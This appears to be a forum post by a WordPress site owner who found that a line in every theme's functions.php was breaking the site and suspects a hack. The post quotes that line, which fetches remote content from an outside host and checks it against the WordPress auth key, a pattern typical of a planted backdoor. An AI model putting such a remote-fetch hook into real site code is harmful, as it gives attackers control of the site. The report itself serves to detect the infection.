The hosting company restored a backup of my server from the day before this happened. It still didn’t work. I commented out the block of code breaking the page and VOILA, it’s up again. The if statement is on line 111 in functions.php in every theme:
if (($tmpcontent = @file_get_contents(“https://www.wacocs.com/code.php”) OR $tmpcontent = @file_get_contents_tcurl(“https://www.wacocs.com/code.php”)) AND stripos($tmpcontent, $wp_auth_key) !== false) {
I feel like I’ve been hacked.